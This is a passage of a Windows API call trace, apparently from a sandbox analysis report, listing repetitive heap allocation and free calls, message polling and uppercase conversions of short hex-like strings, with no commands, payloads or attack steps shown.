out: hHeap=0x2af0000) returned 1 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0090.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.757] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0090.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0090.758] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.758] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0090.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.758] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.759] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0090.759] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0090.759] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d70 [0090.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0090.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d70 | out: hHeap=0x2af0000) returned 1 [0090.762] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0090.762] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.762] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.762] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.762] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.762] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0090.763] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 